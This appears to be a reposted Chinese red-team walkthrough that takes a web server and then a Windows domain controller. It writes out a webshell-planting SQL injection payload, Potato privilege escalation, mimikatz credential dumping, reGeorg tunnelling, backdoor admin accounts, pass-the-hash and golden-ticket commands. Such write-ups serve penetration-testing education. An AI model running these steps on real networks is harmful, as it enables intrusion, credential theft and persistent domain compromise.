前言

網(wǎng)絡(luò)安全的本質(zhì)：懂進攻，知防守，先正向，后逆向。

本篇文章目錄

網(wǎng)絡(luò)拓撲圖：

本次紅隊攻防實戰(zhàn)所需繪制的拓撲圖如下：

邊界突破

訪問網(wǎng)站：

http://xxx.xxx.xxx/?id=1

首頁如下：

SQL注入拿shell

構(gòu)造payload：and 1=1顯示正確，and 1=2顯示錯誤，說明存在SQL注入，并且爆出絕對路徑

使用常用的注入函數(shù)into outfile 將一句話木馬寫入自動創(chuàng)建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有寫入權(quán)限和上一步爆出的絕對路徑

驗證上傳的木馬是否成功，成功寫入木馬

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

成功利用蟻劍拿到shell

→點擊獲取網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略←

2000多本網(wǎng)絡(luò)安全系列電子書
網(wǎng)絡(luò)安全標準題庫資料
項目源碼
網(wǎng)絡(luò)安全基礎(chǔ)入門、Linux、web安全、攻防方面的視頻
網(wǎng)絡(luò)安全學(xué)習(xí)路線圖

內(nèi)網(wǎng)信息收集

whoami
發(fā)現(xiàn)是普通用戶的權(quán)限

ipconfig /all
查看用戶的IP信息，可以看到位于工作組環(huán)境

route print
查看路由，通往10.0.1網(wǎng)段

net config Workstation
查看計算機名、全名、用戶名、系統(tǒng)版本、工作站

.利用蟻劍傳入Potato提權(quán)工具,并使用其虛擬終端，查看權(quán)限，提權(quán)。
將超時時間調(diào)大：

上傳Potato提權(quán)工具成功，改名為xxx.exe

使用命令可以看到成功提權(quán)
xxx.exe -p “whoami”

將mimikatz改名為x.exe，成功上傳

然后在終端執(zhí)行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

查看log.txt，成功抓到當(dāng)前用戶和另一用戶的密碼

和

netstat -ano查看是否開啟3389端口，發(fā)現(xiàn)已開啟

查看防火墻是開啟的
netsh firewall show state

reGeorg內(nèi)網(wǎng)穿透

使用軟件reGeorg實現(xiàn)攻擊機與目標機器的通信
通過蟻劍將reGeorge中的tunnel.php上傳至網(wǎng)站改名為tu.php

并成功訪問

http://xx.xx.xx/tu.php

啟動reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都轉(zhuǎn)發(fā)給指定的那個url，1080是指定的監(jiān)聽端口；

代理可以使用：

內(nèi)網(wǎng)滲透

拿下邊界服務(wù)器
掛上代理遠程連接10.0.1.4

創(chuàng)建新賬號admin 并提權(quán)

xx.exe -p "net user xxx xxxx /add" //新增賬號和對應(yīng)密碼 xx.exe -p "net localgroup administrators xxxx /add"//提升新增賬號的權(quán)限至administrators組

遠程連接

成功連接

將mimikatz添加到桌面并以管理員權(quán)限運行
privilege::debug 提升權(quán)限
log 日志會記錄內(nèi)容
sekurlsa::logonpasswords 抓取密碼

成功抓到管理員賬戶密碼：
使用上述管理員賬號密碼，成功登陸服務(wù)器

通過nbtscan對當(dāng)前C端進行掃描，發(fā)現(xiàn)還有三臺機器存活

拿下域內(nèi)主機

根據(jù)我這個滲透時長兩年半的個人練習(xí)生的經(jīng)驗來判斷，內(nèi)網(wǎng)里的服務(wù)器的賬號密碼有部分可能是相同的。
再使用上述管理員賬號密碼遠程連接10.0.1.8

成功連接

whoami查看是administrator權(quán)限
ipconfig /all查看有域xx.xx

一般DNS服務(wù)器就是域控服務(wù)器

查詢域控主機名，遭拒絕，需利用官方工具將賬號提升至system權(quán)限，再查
net user /domain

上傳官方工具PsExec.exe提權(quán)
PsExec.exe -i -s -d cmd 提升至system權(quán)限，獲取主機名DC.xx.xx

嘗試訪問域控主機C盤
dir \DC.xx.xx\c$

是拒絕的，需要工具minikatz，使用哈希傳遞

拿下域控

將mimikatz添加到桌面并以管理員權(quán)限運行
privilege::debug 提升權(quán)限
log 日志會記錄內(nèi)容
sekurlsa::logonpasswords 抓取密碼

獲取

user=administrator Domain=xxx NTLM=xxxxxxx

將上述值放入下方命令中，完成哈希傳遞，以后利用這個CMD窗口運行,擁有管理員權(quán)限。

sekurlsa::pth /user:administrator /domain:"xx.xx" /ntlm:xxxxxxx

啟動域控主機cmd窗口，成功訪問域控主機C盤
dir \DC.xx.xx\c$

使用官方工具PsExec.exe，命令如下：
PsExec.exe \dc.xx.xx cmd
進入c:
輸入ipconfig， 10.0.1.6為域控ip，此時成功獲取域控cmd

新建賬號，直接遠程登陸域控主機

"net user xxx xxxx /add" //新增賬號和對應(yīng)密碼 "net localgroup administrators xxxx /add"//提升新增賬號的權(quán)限至administrators組

建好賬號后，直接登陸域控主機10.0.1.6(DC.xx.xx)，成功拿下域控主機權(quán)限

至此已成功拿下三臺主機的權(quán)限。

權(quán)限維持

可通過制作黃金票據(jù)進行權(quán)限維持
因為域控主機10.0.1.6安裝了補丁KB2871997，所以無法抓取到明文密碼
管理員運行獼猴桃
log 日志記錄內(nèi)容
lsadump::dcsync /user:krbtgt 獲取內(nèi)容

獲取krbtgt賬號的關(guān)鍵值（OSID和Hash_NTLM）

制作黃金票據(jù)

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如圖

票據(jù)加載成功

普通窗口無法訪問域控根目錄

把域控中的票據(jù)復(fù)制到在10.0.1.8主機中，使用獼猴桃加載票據(jù)
kerberos::ptt xxx.kiribi 加載票據(jù)

然后成功在普通cmd中訪問域控c盤內(nèi)容
dir \DC.xx.xx\c$

PExec.exe \DC.xx.xx cmd 獲取域控cmd

結(jié)語

一名優(yōu)秀的白帽子，是不能有短板的，有的只能是幾塊長板和很多的標準板。

總結(jié)

以上是生活随笔為你收集整理的红队攻防之从边界突破到漫游内网(无cs和msf)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。